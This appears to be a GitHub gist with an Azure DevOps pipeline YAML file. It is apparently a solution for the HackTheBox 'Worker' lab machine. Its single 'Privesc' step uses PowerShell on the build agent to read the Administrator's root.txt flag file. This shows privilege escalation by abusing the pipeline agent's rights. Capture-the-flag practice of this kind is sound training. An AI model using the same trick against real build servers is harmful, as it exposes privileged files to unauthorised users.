Skip to content

Instantly share code, notes, and snippets.

@PwnPeter
Last active December 6, 2020 16:31
Show Gist options
  • Save PwnPeter/c6a12d66831890e044da9e8f9fd4a87d to your computer and use it in GitHub Desktop.
Save PwnPeter/c6a12d66831890e044da9e8f9fd4a87d to your computer and use it in GitHub Desktop.
Exploit Azure DevOps Pipeline
# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml
# This is for htb Worker Box :)
trigger:
- master
pool: 'Setup'
steps:
- powershell: type C:\Users\Administrator\Desktop\root.txt
displayName: 'Privesc'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment